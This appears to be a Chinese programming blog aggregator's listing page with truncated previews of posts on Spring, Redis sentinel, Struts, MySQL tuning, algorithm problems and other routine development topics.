    它的基于bootstrap 的 https://raw.github.com/twbs/bootstrap/master/js/transition.js  transition.js模块引用顺序 <link rel="stylesheet" href="style/zoom.css"> <script src=&q
  • 详解Oracle云操作系统Solaris 11.2 蓝儿唯美 Solaris
    当Oracle发布Solaris 11时,它将自己的操作系统称为第一个面向云的操作系统。Oracle在发布Solaris 11.2时继续它以云为中心的基调。但是,这些说法没有告诉我们为什么Solaris是配得上云的。幸好,我们不需要等太久。Solaris11.2有4个重要的技术可以在一个有效的云实现中发挥重要作用:OpenStack、内核域、统一存档(UA)和弹性虚拟交换(EVS)。 
  • spring学习——springmvc(一) a-john springMVC
    Spring MVC基于模型-视图-控制器(Model-View-Controller,MVC)实现,能够帮助我们构建像Spring框架那样灵活和松耦合的Web应用程序。   1,跟踪Spring MVC的请求 请求的第一站是Spring的DispatcherServlet。与大多数基于Java的Web框架一样,Spring MVC所有的请求都会通过一个前端控制器Servlet。前
  • hdu4342 History repeat itself-------多校联合五 aijuans 数论
    水题就不多说什么了。 #include<iostream>#include<cstdlib>#include<stdio.h>#define ll __int64using namespace std;int main(){ int t; ll n; scanf("%d",&t); while(t--)
  • EJB和javabean的区别 asia007 beanejb
    EJB不是一般的JavaBean,EJB是企业级JavaBean,EJB一共分为3种,实体Bean,消息Bean,会话Bean,书写EJB是需要遵循一定的规范的,具体规范你可以参考相关的资料.另外,要运行EJB,你需要相应的EJB容器,比如Weblogic,Jboss等,而JavaBean不需要,只需要安装Tomcat就可以了   1.EJB用于服务端应用开发, 而JavaBeans
  • Struts的action和Result总结 百合不是茶 strutsAction配置Result配置
        一:Action的配置详解:      下面是一个Struts中一个空的Struts.xml的配置文件     <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE struts PUBLIC &quo
  • 如何带好自已的团队 bijian1013 项目管理团队管理团队
    在网上看到博客" 怎么才能让团队成员好好干活"的评论,觉得写的比较好。 原文如下: 我做团队管理有几年了吧,我和你分享一下我认为带好团队的几点: 1.诚信         对团队内成员,无论是技术研究、交流、问题探讨,要尽可能的保持一种诚信的态度,用心去做好,你的团队会感觉得到。 2.努力提
  • Java代码混淆工具 sunjing ProGuard
    Open Source Obfuscators ProGuard http://java-source.net/open-source/obfuscators/proguardProGuard is a free Java class file shrinker and obfuscator. It can detect and remove unused classes, fields, m
  • 【Redis三】基于Redis sentinel的自动failover主从复制 bit1129 redis
    在第二篇中使用2.8.17搭建了主从复制,但是它存在Master单点问题,为了解决这个问题,Redis从2.6开始引入sentinel,用于监控和管理Redis的主从复制环境,进行自动failover,即Master挂了后,sentinel自动从从服务器选出一个Master使主从复制集群仍然可以工作,如果Master醒来再次加入集群,只能以从服务器的形式工作。   什么是Sentine
  • 使用代理实现Hibernate Dao层自动事务 白糖_ DAOspringAOP框架Hibernate
    都说spring利用AOP实现自动事务处理机制非常好,但在只有hibernate这个框架情况下,我们开启session、管理事务就往往很麻烦。 public void save(Object obj){ Session session = this.getSession(); Transaction tran = session.beginTransaction(); try
  • maven3实战读书笔记 braveCS maven3
    Maven简介 是什么? Is a software project management and comprehension tool.项目管理工具 是基于POM概念(工程对象模型) [设计重复、编码重复、文档重复、构建重复,maven最大化消除了构建的重复] [与XP:简单、交流与反馈;测试驱动开发、十分钟构建、持续集成、富有信息的工作区]     功能:
  • 编程之美-子数组的最大乘积 bylijinnan 编程之美
    public class MaxProduct { /** * 编程之美 子数组的最大乘积 * 题目: 给定一个长度为N的整数数组,只允许使用乘法,不能用除法,计算任意N-1个数的组合中乘积中最大的一组,并写出算法的时间复杂度。 * 以下程序对应书上两种方法,求得“乘积中最大的一组”的乘积——都是有溢出的可能的。 * 但按题目的意思,是要求得这个子数组,而不
  • 读书笔记-2 chengxuyuancsdn 读书笔记
    1、反射 2、oracle年-月-日 时-分-秒 3、oracle创建有参、无参函数 4、oracle行转列 5、Struts2拦截器 6、Filter过滤器(web.xml) 1、反射 (1)检查类的结构 在java.lang.reflect包里有3个类Field,Method,Constructor分别用于描述类的域、方法和构造器。 2、oracle年月日时分秒 s
  • [求学与房地产]慎重选择IT培训学校 comsci it
          关于培训学校的教学和教师的问题,我们就不讨论了,我主要关心的是这个问题       培训学校的教学楼和宿舍的环境和稳定性问题       我们大家都知道,房子是一个比较昂贵的东西,特别是那种能够当教室的房子... &nb
  • RMAN配置中通道(CHANNEL)相关参数 PARALLELISM 、FILESPERSET的关系 daizj oraclermanfilespersetPARALLELISM
    RMAN配置中通道(CHANNEL)相关参数 PARALLELISM 、FILESPERSET的关系 转 PARALLELISM --- 我们还可以通过parallelism参数来指定同时"自动"创建多少个通道: RMAN > configure device type disk parallelism 3 ; 表示启动三个通道,可以加快备份恢复的速度。
  • 简单排序:冒泡排序 dieslrae 冒泡排序
    public void bubbleSort(int[] array){ for(int i=1;i<array.length;i++){ for(int k=0;k<array.length-i;k++){ if(array[k] > array[k+1]){
  • 初二上学期难记单词三 dcj3sjt126com sciet
    concert 音乐会 tonight 今晚 famous 有名的;著名的 song 歌曲 thousand 千 accident 事故;灾难 careless 粗心的,大意的 break 折断;断裂;破碎 heart 心(脏) happen  偶尔发生,碰巧 tourist 旅游者;观光者 science (自然)科学 marry 结婚 subject 题目;
  • I.安装Memcahce 1. 安装依赖包libevent Memcache需要安装libevent,所以安装前可能需要执行 Shell代码 收藏代码 dcj3sjt126com redis
    wget http://download.redis.io/redis-stable.tar.gz tar xvzf redis-stable.tar.gz cd redis-stable make   前面3步应该没有问题,主要的问题是执行make的时候,出现了异常。 异常一: make[2]: cc: Command not found 异常原因:没有安装g
  • 并发容器 shuizhaosi888 并发容器
       通过并发容器来改善同步容器的性能,同步容器将所有对容器状态的访问都串行化,来实现线程安全,这种方式严重降低并发性,当多个线程访问时,吞吐量严重降低。    并发容器ConcurrentHashMap       替代同步基于散列的Map,通过Lock控制。   &nb
  • Spring Security(12)——Remember-Me功能 234390216 Spring SecurityRemember Me记住我
    Remember-Me功能   目录   1.1     概述 1.2     基于简单加密token的方法 1.3     基于持久化token的方法 1.4     Remember-Me相关接口和实现
  • 位运算 焦志广 位运算
    一、位运算符C语言提供了六种位运算符: & 按位与 | 按位或 ^ 按位异或 ~ 取反 << 左移 >> 右移 1. 按位与运算 按位与运算符"&"是双目运算符。其功能是参与运算的两数各对应的二进位相与。只有对应的两个二进位均为1时,结果位才为1 ,否则为0。参与运算的数以补码方式出现。 例如:9&am
  • nodejs 数据库连接 mongodb mysql liguangsong mongodbmysqlnode数据库连接
    1.mysql 连接    package.json中dependencies加入     "mysql":"~2.7.0"    执行 npm install      在config 下创建文件 database.js    
  • java动态编译 olive6615 javaHotSpotjvm动态编译
        在HotSpot虚拟机中,有两个技术是至关重要的,即动态编译(Dynamic compilation)和Profiling。     HotSpot是如何动态编译Javad的bytecode呢?Java bytecode是以解释方式被load到虚拟机的。HotSpot里有一个运行监视器,即Profile Monitor,专门监视
  • Storm0.9.5的集群部署配置优化 roadrunners 优化storm.yaml
    nimbus结点配置(storm.yaml)信息: # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional inf
  • 101个MySQL 的调节和优化的提示 tomcat_oracle mysql
     1. 拥有足够的物理内存来把整个InnoDB文件加载到内存中——在内存中访问文件时的速度要比在硬盘中访问时快的多。   2. 不惜一切代价避免使用Swap交换分区 – 交换时是从硬盘读取的,它的速度很慢。   3. 使用电池供电的RAM(注:RAM即随机存储器)。   4. 使用高级的RAID(注:Redundant Arrays of Inexpensive Disks,即磁盘阵列
  • zoj 3829 Known Notation(贪心) 阿尔萨斯 ZOJ
    题目链接:zoj 3829 Known Notation 题目大意:给定一个不完整的后缀表达式,要求有2种不同操作,用尽量少的操作使得表达式完整。 解题思路:贪心,数字的个数要要保证比∗的个数多1,不够的话优先补在开头是最优的。然后遍历一遍字符串,碰到数字+1,碰到∗-1,保证数字的个数大于等1,如果不够减的话,可以和最后面的一个数字交换位置(用栈维护十分方便),因为添加和交换代价都是1
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他